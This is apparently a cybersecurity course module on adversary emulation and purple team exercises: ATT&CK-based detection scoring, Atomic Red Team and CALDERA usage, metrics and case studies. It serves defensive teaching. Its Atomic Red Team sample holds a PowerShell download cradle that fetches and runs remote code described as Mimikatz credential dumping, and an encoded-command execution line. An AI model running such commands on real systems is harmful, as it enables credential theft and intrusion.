Opening Framing
You've built detections, deployed controls, and trained your team. But do your defenses actually work against real adversaries? Penetration tests tell you what's exploitable, but not whether you'd detect an attack. Vulnerability scans find weaknesses, but not whether your response is effective. Adversary emulation bridges this gap—testing your defenses by mimicking actual threat actor behavior.
Purple teaming takes this further by combining offensive (red team) and defensive (blue team) efforts in collaborative exercises. Instead of adversarial "red vs. blue" competitions, purple teams work together: red executes techniques while blue validates detection, both sides learning and improving in real-time. This collaborative approach dramatically accelerates defensive maturity.
This week covers adversary emulation methodology, purple team operations, ATT&CK-based testing, emulation tools and frameworks, and measuring defensive effectiveness. You'll learn to validate defenses against realistic threats and continuously improve detection capabilities.
Key insight: The goal isn't to break things—it's to learn whether you'd detect real attacks and improve where you wouldn't.
1) Understanding Adversary Emulation
Adversary emulation differs from traditional security testing by focusing on realistic threat simulation:
Security Testing Spectrum:
┌─────────────────────────────────────────────────────────────┐
│ VULNERABILITY SCANNING │
│ Purpose: Find known vulnerabilities │
│ Method: Automated scanning │
│ Output: List of CVEs and misconfigurations │
│ Limitation: Doesn't test detection/response │
├─────────────────────────────────────────────────────────────┤
│ PENETRATION TESTING │
│ Purpose: Prove exploitability │
│ Method: Exploit vulnerabilities to gain access │
│ Output: Proof of compromise, attack paths │
│ Limitation: Often doesn't mimic real adversary TTPs │
├─────────────────────────────────────────────────────────────┤
│ RED TEAMING │
│ Purpose: Test organization holistically │
│ Method: Realistic adversary simulation │
│ Output: Assessment of security posture │
│ Limitation: May not focus on specific threat actors │
├─────────────────────────────────────────────────────────────┤
│ ADVERSARY EMULATION │
│ Purpose: Test defenses against specific threats │
│ Method: Replicate known adversary TTPs exactly │
│ Output: Validated detection and response capabilities │
│ Focus: Threat-informed, ATT&CK-mapped testing │
├─────────────────────────────────────────────────────────────┤
│ PURPLE TEAMING │
│ Purpose: Collaborative defense improvement │
│ Method: Red + blue working together │
│ Output: Detection improvements, validated capabilities │
│ Focus: Learning and improvement over "winning" │
└─────────────────────────────────────────────────────────────┘
Why Adversary Emulation?
Adversary Emulation Value:
THREAT-INFORMED TESTING:
┌─────────────────────────────────────────────────────────────┐
│ Traditional Pentest: │
│ "Can we get domain admin?" │
│ → Uses whatever techniques work fastest │
│ → May not test your most relevant threats │
│ │
│ Adversary Emulation: │
│ "Can we detect APT29's specific techniques?" │
│ → Uses exact TTPs of relevant threat actor │
│ → Tests defenses against actual threats you face │
└─────────────────────────────────────────────────────────────┘
DETECTION VALIDATION:
┌─────────────────────────────────────────────────────────────┐
│ Problem: Detection rules may look good on paper │
│ │
│ Reality Check: │
│ - Rule may have errors │
│ - Data source may be missing │
│ - Parsing may fail │
│ - Alert may be ignored │
│ - Response may be inadequate │
│ │
│ Emulation: Actually test if detection works end-to-end │
└─────────────────────────────────────────────────────────────┘
ATT&CK COVERAGE MEASUREMENT:
┌─────────────────────────────────────────────────────────────┐
│ Before Emulation: │
│ "We think we detect T1059.001 PowerShell" │
│ │
│ After Emulation: │
│ "We verified detection of 7 of 10 T1059.001 variations" │
│ "We created new rules for the 3 missed variations" │
│ │
│ Value: Confidence based on evidence, not assumption │
└─────────────────────────────────────────────────────────────┘
DEFENSE IMPROVEMENT CYCLE:
┌─────────────────────────────────────────────────────────────┐
│ │
│ ┌──────────────┐ │
│ │ Threat │ │
│ │ Intel │ │
│ └──────┬───────┘ │
│ │ │
│ ▼ │
│ ┌──────────────┐ ┌──────────────┐ │
│ │ Emulate │─────▶│ Detect? │ │
│ │ Technique │ │ (Validate) │ │
│ └──────────────┘ └──────┬───────┘ │
│ ▲ │ │
│ │ ┌──────┴───────┐ │
│ │ │ │ │
│ │ YES ▼ NO ▼ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ Document │ │ Improve │ │
│ │ │ Coverage │ │ Detection│ │
│ │ └──────────┘ └────┬─────┘ │
│ │ │ │
│ └─────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────┘
Emulation Planning:
Emulation Plan Components:
1. THREAT SELECTION
┌─────────────────────────────────────────────────────────────┐
│ Select adversary to emulate based on: │
│ - Relevance to your organization │
│ - Available threat intelligence │
│ - ATT&CK documentation │
│ - Detection gaps to test │
│ │
│ Example: "Emulate FIN7 because they target retail and │
│ we have significant detection gaps in their TTPs" │
└─────────────────────────────────────────────────────────────┘
2. SCOPE DEFINITION
┌─────────────────────────────────────────────────────────────┐
│ Define what will be tested: │
│ - Which phases of kill chain? │
│ - Which specific techniques? │
│ - What systems are in scope? │
│ - What actions are authorized? │
│ - What are safety boundaries? │
│ │
│ Example: "Test initial access through execution phases │
│ on test systems, no actual data exfiltration" │
└─────────────────────────────────────────────────────────────┘
3. TECHNIQUE SEQUENCE
┌─────────────────────────────────────────────────────────────┐
│ Map specific techniques to execute: │
│ │
│ Phase 1: Initial Access │
│ - T1566.001: Spearphishing Attachment (macro document) │
│ │
│ Phase 2: Execution │
│ - T1059.001: PowerShell download cradle │
│ - T1204.002: User execution of malicious file │
│ │
│ Phase 3: Persistence │
│ - T1547.001: Registry Run Key │
│ - T1053.005: Scheduled Task │
│ │
│ Phase 4: Discovery │
│ - T1087.002: Domain Account discovery │
│ - T1018: Remote System Discovery │
└─────────────────────────────────────────────────────────────┘
4. SUCCESS CRITERIA
┌─────────────────────────────────────────────────────────────┐
│ Define what "success" means: │
│ │
│ Detection Success: │
│ - Alert generated within X minutes │
│ - Alert correctly identifies technique │
│ - Alert contains sufficient context │
│ │
│ Response Success: │
│ - Alert triaged within SLA │
│ - Correct escalation path followed │
│ - Containment actions taken │
└─────────────────────────────────────────────────────────────┘
Key insight: Adversary emulation is about validated confidence. You move from "we think we detect this" to "we know we detect this."
2) Purple Team Operations
Purple teaming combines red and blue team expertise in collaborative exercises focused on improvement:
Purple Team Model:
TRADITIONAL (Adversarial):
┌─────────────────────────────────────────────────────────────┐
│ │
│ RED TEAM BLUE TEAM │
│ ┌───────────┐ ┌───────────┐ │
│ │ Attack │ vs. │ Defend │ │
│ │ (hidden) │ │ (blind) │ │
│ └───────────┘ └───────────┘ │
│ │
│ - Operates in secret - Discovers attacks │
│ - Goal: Prove compromise - Goal: Detect/respond │
│ - Report at end - Limited learning │
│ │
│ Problems: │
│ - Learning happens only at end │
│ - Red may use techniques irrelevant to real threats │
│ - Blue doesn't know what to improve │
│ - Adversarial relationship │
└─────────────────────────────────────────────────────────────┘
PURPLE TEAM (Collaborative):
┌─────────────────────────────────────────────────────────────┐
│ │
│ RED TEAM BLUE TEAM │
│ ┌───────────┐ ┌───────────┐ │
│ │ Execute │◄────────────────►│ Validate │ │
│ │ Technique │ Collaboration │ Detection │ │
│ └───────────┘ └───────────┘ │
│ │ │ │
│ └───────────┬───────────────────┘ │
│ │ │
│ ┌──────▼──────┐ │
│ │ IMPROVE │ │
│ │ TOGETHER │ │
│ └─────────────┘ │
│ │
│ - Red executes technique │
│ - Blue validates detection (or not) │
│ - Both discuss and improve │
│ - Repeat with next technique │
│ - Learning happens continuously │
└─────────────────────────────────────────────────────────────┘
Purple Team Workflow:
Purple Team Exercise Flow:
PREPARATION (Before Exercise):
┌─────────────────────────────────────────────────────────────┐
│ 1. Select techniques to test │
│ 2. Prepare emulation tools/procedures │
│ 3. Identify expected detections │
│ 4. Set up test environment │
│ 5. Brief all participants │
│ 6. Establish communication channels │
└─────────────────────────────────────────────────────────────┘
EXECUTION (Per Technique):
┌─────────────────────────────────────────────────────────────┐
│ Step 1: RED announces technique to execute │
│ "Executing T1059.001 - PowerShell download cradle" │
│ │
│ Step 2: BLUE prepares to observe │
│ Opens SIEM, EDR, relevant dashboards │
│ │
│ Step 3: RED executes technique │
│ Runs actual PowerShell command │
│ │
│ Step 4: BLUE validates detection │
│ "Alert fired / No alert / Partial detection" │
│ │
│ Step 5: BOTH discuss results │
│ Why detected / why missed │
│ What data was available │
│ How to improve │
│ │
│ Step 6: DOCUMENT findings │
│ Detection status, improvements needed │
│ │
│ Step 7: MOVE to next technique │
└─────────────────────────────────────────────────────────────┘
POST-EXERCISE:
┌─────────────────────────────────────────────────────────────┐
│ - Compile results into coverage matrix │
│ - Prioritize detection improvements │
│ - Create/update detection rules │
│ - Update documentation │
│ - Schedule follow-up testing │
│ - Brief stakeholders on findings │
└─────────────────────────────────────────────────────────────┘
Purple Team Roles:
Purple Team Participants:
RED TEAM OPERATOR:
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Execute techniques as specified │
│ - Document exact commands/actions │
│ - Explain technique variations │
│ - Suggest additional test cases │
│ │
│ Skills Needed: │
│ - Offensive security techniques │
│ - Adversary tool proficiency │
│ - ATT&CK knowledge │
│ - Clear communication │
└─────────────────────────────────────────────────────────────┘
BLUE TEAM ANALYST:
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Monitor for detection during execution │
│ - Validate alerts and logs │
│ - Identify detection gaps │
│ - Propose detection improvements │
│ │
│ Skills Needed: │
│ - SIEM/EDR proficiency │
│ - Detection engineering │
│ - Log analysis │
│ - Threat knowledge │
└─────────────────────────────────────────────────────────────┘
PURPLE TEAM LEAD:
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Plan and coordinate exercise │
│ - Facilitate discussion │
│ - Ensure documentation │
│ - Track findings and improvements │
│ - Report to stakeholders │
│ │
│ Skills Needed: │
│ - Both offensive and defensive understanding │
│ - Project management │
│ - Communication skills │
│ - ATT&CK expertise │
└─────────────────────────────────────────────────────────────┘
DETECTION ENGINEER (Optional):
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Create/tune detections in real-time │
│ - Implement improvements immediately │
│ - Test new detections │
│ │
│ Value: Immediate improvement, not just documentation │
└─────────────────────────────────────────────────────────────┘
Key insight: Purple teaming is a mindset, not just an activity. It's about red and blue working toward the same goal: better defense.
3) ATT&CK-Based Testing
MITRE ATT&CK provides the framework for structured adversary emulation and detection validation:
ATT&CK Evaluation Methodology:
TECHNIQUE SELECTION:
┌─────────────────────────────────────────────────────────────┐
│ Criteria for selecting techniques to test: │
│ │
│ 1. Threat Relevance │
│ - Used by adversaries targeting your sector │
│ - Part of campaigns you've seen intelligence on │
│ │
│ 2. Detection Gap │
│ - Techniques you're uncertain about detecting │
│ - Low confidence coverage in Navigator │
│ │
│ 3. Critical Techniques │
│ - High-impact techniques (credential access, etc.) │
│ - Techniques used across many adversaries │
│ │
│ 4. Testability │
│ - Can safely execute in your environment │
│ - Tools available for emulation │
└─────────────────────────────────────────────────────────────┘
TECHNIQUE TESTING FRAMEWORK:
┌─────────────────────────────────────────────────────────────┐
│ For each technique, document: │
│ │
│ BEFORE: │
│ - Expected detection (what should fire) │
│ - Data sources required │
│ - Execution method planned │
│ │
│ DURING: │
│ - Exact command/action executed │
│ - Timestamp of execution │
│ - System executed on │
│ │
│ AFTER: │
│ - Detection result (detected/partial/missed) │
│ - Alert details if detected │
│ - Why missed if not detected │
│ - Improvement actions │
└─────────────────────────────────────────────────────────────┘
Detection Scoring:
ATT&CK Detection Scoring System:
DETECTION CATEGORIES:
None (0):
┌─────────────────────────────────────────────────────────────┐
│ - No telemetry collected │
│ - No visibility into technique │
│ - Cannot detect regardless of effort │
│ │
│ Action: Enable required data sources │
└─────────────────────────────────────────────────────────────┘
Telemetry (1):
┌─────────────────────────────────────────────────────────────┐
│ - Data is collected and available │
│ - No detection rule exists │
│ - Could hunt manually but no alert │
│ │
│ Action: Create detection rule │
└─────────────────────────────────────────────────────────────┘
General Detection (2):
┌─────────────────────────────────────────────────────────────┐
│ - Alert fires but generic │
│ - May identify suspicious activity │
│ - Doesn't specifically identify the technique │
│ │
│ Action: Tune for technique specificity │
└─────────────────────────────────────────────────────────────┘
Tactic Detection (3):
┌─────────────────────────────────────────────────────────────┐
│ - Alert fires and identifies the tactic │
│ - "Persistence detected" vs "Registry Run Key detected" │
│ - Useful but not precise │
│ │
│ Action: Enhance for technique-level detection │
└─────────────────────────────────────────────────────────────┘
Technique Detection (4):
┌─────────────────────────────────────────────────────────────┐
│ - Alert specifically identifies the technique │
│ - "T1547.001 Registry Run Key Persistence" │
│ - Provides actionable context │
│ │
│ Target: This is the goal for most techniques │
└─────────────────────────────────────────────────────────────┘
COVERAGE SCORING:
Per Technique:
- Score each variation tested (0-4)
- Average for overall technique score
Per Tactic:
- Average of all technique scores in tactic
Overall:
- Weighted average across all tested techniques
- Track improvement over time
Example Scorecard:
┌─────────────────────────────────────────────────────────────┐
│ Technique │ Var1 │ Var2 │ Var3 │ Avg │ Status │
├────────────────────┼──────┼──────┼──────┼──────┼───────────┤
│ T1059.001 PowerShell│ 4 │ 4 │ 2 │ 3.3 │ Good │
│ T1547.001 Run Keys │ 4 │ 3 │ - │ 3.5 │ Good │
│ T1003.001 LSASS │ 2 │ 0 │ - │ 1.0 │ Gap │
│ T1053.005 Sched Task│ 4 │ 4 │ 4 │ 4.0 │ Excellent │
└────────────────────┴──────┴──────┴──────┴──────┴───────────┘
MITRE ATT&CK Evaluations:
Learning from ATT&CK Evaluations:
WHAT ARE ATT&CK EVALUATIONS:
┌─────────────────────────────────────────────────────────────┐
│ MITRE Engenuity tests security products against real │
│ adversary TTPs and publishes detailed results │
│ │
│ Value for Defenders: │
│ - See how products detect specific techniques │
│ - Understand detection capabilities │
│ - Compare vendor claims to actual performance │
│ - Learn what "good" detection looks like │
└─────────────────────────────────────────────────────────────┘
EVALUATION ROUNDS:
- APT3 (2018): First evaluation
- APT29 (2020): Russian espionage TTPs
- Carbanak + FIN7 (2021): Financial threat actors
- Wizard Spider + Sandworm (2022): Ransomware + destructive
- Turla (2023): Advanced espionage
USING EVALUATION RESULTS:
┌─────────────────────────────────────────────────────────────┐
│ 1. Review your product's results │
│ 2. Identify techniques with poor detection │
│ 3. Understand WHY detection failed │
│ 4. Implement compensating controls │
│ 5. Request improvements from vendor │
│ 6. Test same techniques in your environment │
└─────────────────────────────────────────────────────────────┘
Example Insight:
"ATT&CK evaluation showed our EDR missed T1055.012
Process Hollowing. We've added compensating Sysmon
detection and opened case with vendor for improvement."
Key insight: ATT&CK provides a common language for discussing detection capabilities. Use it to compare, measure, and improve.
4) Emulation Tools and Frameworks
Various tools enable safe, repeatable adversary emulation:
Emulation Tool Categories:
ATOMIC TEST LIBRARIES:
┌─────────────────────────────────────────────────────────────┐
│ Atomic Red Team: │
│ - Small, focused tests for individual techniques │
│ - Community-maintained library │
│ - Easy to execute, easy to understand │
│ - Maps directly to ATT&CK │
│ │
│ Use Case: Quick technique validation │
│ URL: github.com/redcanaryco/atomic-red-team │
│ │
│ Example: │
│ Invoke-AtomicTest T1059.001 -TestNumbers 1 │
│ # Executes first PowerShell test case │
└─────────────────────────────────────────────────────────────┘
ADVERSARY EMULATION PLATFORMS:
┌─────────────────────────────────────────────────────────────┐
│ MITRE CALDERA: │
│ - Full adversary emulation platform │
│ - Agent-based execution │
│ - Automated attack chains │
│ - Built-in adversary profiles │
│ │
│ Use Case: Automated, complex emulation │
│ URL: github.com/mitre/caldera │
│ │
│ SCYTHE: │
│ - Commercial adversary emulation platform │
│ - Threat intelligence integration │
│ - Detailed reporting │
│ │
│ Infection Monkey (Guardicore): │
│ - Breach and attack simulation │
│ - Network propagation testing │
│ - Zero-trust validation │
└─────────────────────────────────────────────────────────────┘
OFFENSIVE SECURITY TOOLS:
┌─────────────────────────────────────────────────────────────┐
│ Cobalt Strike: │
│ - Professional adversary simulation │
│ - Realistic C2 capabilities │
│ - Used by real adversaries (good for realistic testing) │
│ │
│ Metasploit: │
│ - Open source penetration testing framework │
│ - Extensive module library │
│ - Good for specific technique testing │
│ │
│ Sliver: │
│ - Open source C2 framework │
│ - Cross-platform implants │
│ - Active development │
└─────────────────────────────────────────────────────────────┘
Atomic Red Team Deep Dive:
Using Atomic Red Team:
STRUCTURE:
atomics/
├── T1059.001/ # PowerShell
│ ├── T1059.001.yaml # Test definitions
│ └── T1059.001.md # Documentation
├── T1547.001/ # Registry Run Keys
│ ├── T1547.001.yaml
│ └── T1547.001.md
└── ...
TEST DEFINITION (T1059.001.yaml):
attack_technique: T1059.001
display_name: PowerShell
atomic_tests:
- name: Mimikatz
description: Download Mimikatz and dump creds
supported_platforms:
- windows
executor:
command: |
powershell.exe "IEX (New-Object
Net.WebClient).DownloadString
('https://raw.githubusercontent.com/...')"
name: command_prompt
- name: Encoded Commands
description: Execute base64 encoded PowerShell
supported_platforms:
- windows
input_arguments:
encoded_command:
description: Base64 encoded command
type: String
default: "V2hvYW1p"
executor:
command: |
powershell.exe -enc #{encoded_command}
name: command_prompt
EXECUTION:
# List available tests for technique
Invoke-AtomicTest T1059.001 -ShowDetailsBrief
# Execute specific test
Invoke-AtomicTest T1059.001 -TestNumbers 2
# Execute with custom input
Invoke-AtomicTest T1059.001 -TestNumbers 2
-InputArgs @{"encoded_command"="[base64]"}
# Execute all tests for technique
Invoke-AtomicTest T1059.001
# Cleanup after test
Invoke-AtomicTest T1059.001 -Cleanup
CALDERA Overview:
MITRE CALDERA:
ARCHITECTURE:
┌─────────────────────────────────────────────────────────────┐
│ CALDERA SERVER │
│ ┌─────────────────────────────────────────────────────┐ │
│ │ Adversary Profiles (APT3, APT29, custom) │ │
│ │ Abilities Library (ATT&CK-mapped techniques) │ │
│ │ Planner (how to chain techniques) │ │
│ │ Reporting │ │
│ └─────────────────────────────────────────────────────┘ │
│ │ │
│ ┌────────────┼────────────┐ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌────────┐ ┌────────┐ ┌────────┐ │
│ │ Agent │ │ Agent │ │ Agent │ │
│ │(Target)│ │(Target)│ │(Target)│ │
│ └────────┘ └────────┘ └────────┘ │
└─────────────────────────────────────────────────────────────┘
KEY CONCEPTS:
Abilities:
- Individual techniques mapped to ATT&CK
- Executable commands
- Platform-specific implementations
Adversaries:
- Collections of abilities
- Emulate specific threat actors
- Custom or pre-built
Operations:
- Running an adversary against agents
- Tracks execution and results
- Provides reporting
Planners:
- Determine order of technique execution
- Can be sequential, random, or intelligent
EXAMPLE WORKFLOW:
1. Deploy agents to test systems
2. Select adversary profile (or create custom)
3. Start operation
4. Agents execute techniques
5. Blue team monitors for detection
6. Review results and detection gaps
Key insight: Tools enable consistent, repeatable testing. Choose based on your needs: quick validation (Atomic) vs. full campaigns (CALDERA, Cobalt Strike).
5) Measuring Defensive Effectiveness
Purple team exercises produce metrics that demonstrate and improve defensive capabilities:
Detection Metrics:
COVERAGE METRICS:
┌─────────────────────────────────────────────────────────────┐
│ ATT&CK Technique Coverage: │
│ - % of relevant techniques with validated detection │
│ - Breakdown by tactic │
│ - Trend over time │
│ │
│ Example: │
│ Execution Techniques: 12/15 detected (80%) │
│ Persistence Techniques: 8/12 detected (67%) │
│ Defense Evasion: 5/18 detected (28%) ← Gap │
└─────────────────────────────────────────────────────────────┘
DETECTION QUALITY:
┌─────────────────────────────────────────────────────────────┐
│ Mean Time to Detect (MTTD): │
│ - How fast does alert fire after technique execution? │
│ - Target: <5 minutes for critical techniques │
│ │
│ Alert Fidelity: │
│ - Does alert correctly identify the technique? │
│ - Is there sufficient context for investigation? │
│ │
│ False Positive Rate: │
│ - How often does detection fire on benign activity? │
│ - Target: <5% false positive rate │
└─────────────────────────────────────────────────────────────┘
RESPONSE METRICS:
┌─────────────────────────────────────────────────────────────┐
│ Mean Time to Respond (MTTR): │
│ - Time from alert to analyst acknowledgment │
│ - Time to investigation completion │
│ - Time to containment action │
│ │
│ Response Accuracy: │
│ - Was the technique correctly identified? │
│ - Were appropriate actions taken? │
│ - Was escalation appropriate? │
└─────────────────────────────────────────────────────────────┘
Tracking Improvement:
Purple Team Results Tracking:
COVERAGE MATRIX:
Technique │Jan│Feb│Mar│Apr│ Trend │
─────────────────┼───┼───┼───┼───┼───────┤
T1059.001 PS │ 2 │ 3 │ 4 │ 4 │ ↑ │
T1547.001 RegRun │ 3 │ 3 │ 4 │ 4 │ ↑ │
T1003.001 LSASS │ 0 │ 1 │ 2 │ 3 │ ↑ │
T1055 Injection │ 0 │ 0 │ 1 │ 2 │ ↑ │
T1021.002 SMB │ 2 │ 2 │ 2 │ 3 │ ↑ │
─────────────────┴───┴───┴───┴───┴───────┘
(0=None, 1=Telemetry, 2=General, 3=Tactic, 4=Technique)
IMPROVEMENT TRACKING:
Q1 2024 Purple Team Results:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Techniques Tested: 45
Detection Rate: 62% (28/45)
Detection Improvements: 12 new rules created
Coverage Increase: +15% from Q4
Gap Analysis:
- Defense Evasion: 28% coverage (Priority 1)
- Credential Access: 45% coverage (Priority 2)
- Collection: 50% coverage (Priority 3)
Remediation Plan:
- 5 new detection rules for Defense Evasion (March)
- Sysmon Event 10 deployment for Cred Access (April)
- Enhanced logging for Collection techniques (May)
Reporting to Stakeholders:
Purple Team Executive Report:
PURPLE TEAM ASSESSMENT - Q1 2024
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
EXECUTIVE SUMMARY
We tested our defenses against 45 techniques used by
threat actors targeting our sector. Detection rate
improved from 47% to 62% since last quarter.
KEY FINDINGS
Detection Strengths:
✓ Initial Access: 85% detection rate
✓ Execution: 80% detection rate
✓ Persistence: 75% detection rate
Detection Gaps:
✗ Defense Evasion: 28% detection rate
(Adversaries using this to avoid detection)
✗ Credential Access: 45% detection rate
(High-impact techniques for privilege escalation)
BUSINESS IMPACT
If attacked by APT group targeting our sector:
- Before Purple Team: ~45% chance of detection
- After Improvements: ~62% chance of detection
- Target (EOY): 80% detection rate
INVESTMENT RECOMMENDATIONS
1. Endpoint visibility enhancement: $50K
Impact: +20% detection coverage
2. Detection engineering sprint: 2 FTE x 1 month
Impact: +15 new detection rules
3. Advanced EDR features: $75K/year
Impact: +10% evasion technique detection
NEXT STEPS
- April: Defense Evasion focused testing
- May: Credential Access technique validation
- June: Re-test all previously failed techniques
Key insight: Metrics turn purple team exercises into business value. Track improvement over time to demonstrate ROI.
Real-World Context
Case Study: Financial Services Purple Team
A large bank implemented monthly purple team exercises focused on FIN7 and Carbanak TTPs—threat groups known to target financial services. First exercise revealed only 35% detection rate for the 40 techniques tested. Most gaps were in defense evasion and lateral movement. Over six months, the team conducted focused exercises each month, implementing detection improvements between sessions. By month six, detection rate reached 78%. More importantly, mean time to detect dropped from 4 hours to 15 minutes for detected techniques. When a real incident occurred (BEC attempt that progressed to internal reconnaissance), SOC detected and contained it within 30 minutes—using detection rules developed during purple team exercises.
Case Study: Healthcare Ransomware Preparedness
A healthcare system used purple teaming to prepare for ransomware attacks. They built an emulation plan based on Conti and LockBit TTPs, testing the complete attack chain from phishing through encryption. Initial exercise was sobering: they detected initial access but missed the entire lateral movement and pre-encryption staging. Purple team identified that their network segmentation was providing false confidence—attackers could move freely once inside trusted segments. They implemented network detection, enhanced endpoint visibility in critical segments, and added behavioral detections for pre-encryption behaviors (volume shadow copy deletion, backup service manipulation). Follow-up exercise showed 85% detection rate with multiple opportunities to stop the attack chain.
Common Purple Team Pitfalls:
What Goes Wrong:
PITFALL: "Check the Box" Exercises
┌─────────────────────────────────────────────────────────────┐
│ Problem: Running exercises for compliance, not improvement │
│ Symptom: Same results year after year │
│ Fix: Focus on improvement metrics, not just completion │
└─────────────────────────────────────────────────────────────┘
PITFALL: Red Team vs. Blue Team Mentality
┌─────────────────────────────────────────────────────────────┐
│ Problem: Adversarial relationship, information hoarding │
│ Symptom: Blue team doesn't learn, red team "wins" │
│ Fix: Emphasize collaboration, shared goals, no "winners" │
└─────────────────────────────────────────────────────────────┘
PITFALL: No Follow-Through
┌─────────────────────────────────────────────────────────────┐
│ Problem: Findings documented but never addressed │
│ Symptom: Same gaps found in every exercise │
│ Fix: Assign owners, track remediation, re-test │
└─────────────────────────────────────────────────────────────┘
PITFALL: Unrealistic Scope
┌─────────────────────────────────────────────────────────────┐
│ Problem: Testing 100 techniques in one day │
│ Symptom: Superficial testing, no time for analysis │
│ Fix: Smaller scope, deeper testing, quality over quantity │
└─────────────────────────────────────────────────────────────┘
PITFALL: Production Impact
┌─────────────────────────────────────────────────────────────┐
│ Problem: Testing causes outages or alerts security team │
│ Symptom: Disruption, loss of trust in program │
│ Fix: Proper scoping, test environments, coordination │
└─────────────────────────────────────────────────────────────┘
SUCCESS FACTORS:
✓ Executive sponsorship
✓ Dedicated time for exercises
✓ Clear improvement tracking
✓ Integration with detection engineering
✓ Realistic, threat-informed scenarios
✓ Collaborative culture
Purple teaming is a journey, not a destination. The value comes from continuous improvement, not one-time exercises.
Guided Lab: Purple Team Exercise
In this lab, you'll plan and execute a focused purple team exercise using Atomic Red Team.
Lab Environment:
- Windows test VM with Atomic Red Team installed
- SIEM or log analysis platform
- ATT&CK Navigator
- Exercise planning template
Exercise Steps:
- Select 5 techniques to test based on threat intel
- Document expected detections for each
- Prepare Atomic Red Team tests
- Execute techniques one at a time
- Validate detection for each (detected/missed)
- Document findings and gaps
- Propose detection improvements for gaps
- Create coverage Navigator layer
- Write exercise summary report
Reflection Questions:
- Which techniques had the best/worst detection?
- What was the common cause of detection gaps?
- How would you prioritize improvements?
Week Outcome Check
By the end of this week, you should be able to:
- Distinguish adversary emulation from other security testing
- Explain the purple team collaborative model
- Plan threat-informed emulation exercises
- Use ATT&CK for structured detection testing
- Execute techniques using Atomic Red Team
- Score and track detection coverage
- Convert exercise findings into improvements
- Report purple team results to stakeholders
🎯 Hands-On Labs (Free & Essential)
Practice adversary emulation workflows before moving to reading resources.
🎮 TryHackMe: Red Team Fundamentals
What you'll do: Review adversary emulation concepts and testing workflows.
Why it matters: Solid foundations make purple team exercises effective.
Time estimate: 1.5-2 hours
🧨 Atomic Red Team: Technique Validation Sprint
What you'll do: Execute 5 ATT&CK tests and score detections (hit/miss).
Why it matters: Emulation exposes gaps you can fix immediately.
Time estimate: 2-3 hours
🛰️ MITRE Caldera: Run a Stock Operation
What you'll do: Launch a preset adversary profile and review telemetry.
Why it matters: Caldera simulates full kill chains for validation.
Time estimate: 2-3 hours
🧩 Lab: Supply Chain Emulation Plan
What you'll do: Design an emulation plan for a supply chain compromise.
Deliverable: Technique list, telemetry sources, and expected detections.
Why it matters: Purple team validation is the fastest way to close gaps.
Time estimate: 60-90 minutes
💡 Lab Tip: Start with low-impact techniques before expanding to noisy tests.
🧩 Supply Chain Emulation
Emulation helps validate defenses against compromised updates, build pipeline abuse, and trusted relationship misuse.
Emulation focus:
- T1195 supply chain compromise
- Trusted installer execution paths
- Update server traffic patterns
- Credential access via vendor tooling
📚 Building on CSY101 Week-13: Threat model trusted update paths before emulation.
Resources
Lab
Complete the following lab exercises to practice adversary emulation and purple team operations.